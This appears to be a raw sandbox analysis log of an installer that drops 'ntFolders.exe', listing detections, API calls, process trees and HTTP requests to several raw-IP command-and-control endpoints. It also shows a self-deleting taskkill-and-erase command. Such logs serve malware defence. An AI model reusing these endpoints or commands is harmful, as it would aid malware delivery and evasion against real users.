Source: 0.0.file.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2 |
Source: 0.3.file.exe.1fa8000.6.unpack | Avira: Label: TR/Patched.Ren.Gen |
Source: 0.2.file.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2 |
Source: 2.2.ntFolders.exe.10000000.6.unpack | Avira: Label: TR/Crypt.XPACK.Gen8 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_10001000 ISCryptGetVersion, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_10001130 ArcFourCrypt, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00451554 FindFirstFileA,GetLastError, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0048A778 FindFirstFileA,6D2D69D0,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00423E2D FindFirstFileExW, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_1000959D FindFirstFileExW, |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\ |
Source: unknown | TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: ntFolders.exe, 00000002.00000002.330219181.000000000174F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.182.129.235/storage/extension.php |
Source: ntFolders.exe, 00000002.00000002.330100213.0000000001724000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.182.129.235/storage/ping.php |
Source: ntFolders.exe, 00000002.00000002.330100213.0000000001724000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://171.22.30.106/library.php |
Source: ntFolders.exe, 00000002.00000002.330100213.0000000001724000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://171.22.30.106/library.phpY |
Source: ntFolders.exe, 00000002.00000002.330100213.0000000001724000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.139.10 |
Source: ntFolders.exe, 00000002.00000002.330236396.000000000175A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte |
Source: file.exe | String found in binary or memory: http://www.innosetup.com |
Source: is-188R9.tmp, is-188R9.tmp, 00000001.00000002.331460678.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr | String found in binary or memory: http://www.innosetup.com/ |
Source: file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp, is-188R9.tmp, 00000001.00000000.242952411.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr | String found in binary or memory: http://www.innosetup.comDVarFileInfo$ |
Source: file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp, is-188R9.tmp, is-188R9.tmp, 00000001.00000002.331460678.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/?ps |
Source: file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp, is-188R9.tmp, 00000001.00000002.331460678.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-NNEQH.tmp.1.dr, is-188R9.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/?psU |
Source: global traffic | HTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: Yara match | File source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.ntFolders.exe.3330000.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.ntFolders.exe.3330000.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000002.330488356.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.329404364.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.330580256.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004081C8 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00468940 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00460F30 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0043DF70 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004303A4 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0047A6D8 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004446E8 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00434994 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0045AA90 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00480BDC |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00444C90 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00462F38 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00445388 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00435698 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00445794 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0042F948 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00457BB4 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00404490 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_004096F0 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_004056A0 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00406800 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00406AA0 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00404D40 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00405F40 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00402F20 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_004150D3 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00415305 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_004223A9 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00419510 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00404840 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00426850 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00410A50 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0042AB9A |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00421C88 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0042ACBA |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00447D2D |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00428D39 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00404F20 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_1000F670 |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_1000EC61 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 004035DC appears 90 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 00403548 appears 61 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 00407B08 appears 33 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 00445FF4 appears 43 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 00455A04 appears 49 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 004037CC appears 193 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 00405AA4 appears 92 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 00455814 appears 86 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 004462C4 appears 58 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 004348AC appears 32 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 00451AFC appears 62 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: String function: 00408DF0 appears 42 times |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: String function: 10003C50 appears 33 times |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: String function: 0040F9E0 appears 54 times |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00423D9C NtdllDefWindowProc_A, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004127F0 NtdllDefWindowProc_A, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004551C4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, |
Source: is-188R9.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows |
Source: is-188R9.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows |
Source: is-188R9.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
Source: is-NNEQH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows |
Source: is-NNEQH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows |
Source: is-NNEQH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
Source: file.exe, 00000000.00000000.241847844.0000000000410000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename" vs file.exe |
Source: file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe |
Source: file.exe, 00000000.00000003.242455241.0000000001FA8000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename6 vs file.exe |
Source: file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe |
Source: file.exe, 00000000.00000003.242311828.0000000002090000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename6 vs file.exe |
Source: file.exe | Binary or memory string: OriginalFilename" vs file.exe |
Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp "C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp" /SL4 $402C2 "C:\Users\user\Desktop\file.exe" 2023066 96256 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process created: C:\Program Files (x86)\PrintFolders\ntFolders.exe "C:\Program Files (x86)\PrintFolders\ntFolders.exe" |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp "C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp" /SL4 $402C2 "C:\Users\user\Desktop\file.exe" 2023066 96256 |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Process created: C:\Program Files (x86)\PrintFolders\ntFolders.exe "C:\Program Files (x86)\PrintFolders\ntFolders.exe" |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408F74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D784E70, |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00453A8C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D784E70, |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Command line argument: `a}{ |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Command line argument: MFE. |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Command line argument: ZK]Z |
Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Command line argument: ZK]Z |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406584 push 004065C1h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404159 push eax; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404229 push 00404435h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00407E84 push ecx; mov dword ptr [esp], eax |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004042AA push 00404435h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408B24 push 00408B57h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404327 push 00404435h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040438C push 00404435h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00409B70 push 00409BADh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040A257 push ds; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_00478210 push 004782BBh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_0040A22B push ds; ret |
Source: C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp | Code function: 1_2_004063C8 push ecx; mov dword ptr [esp], eax |
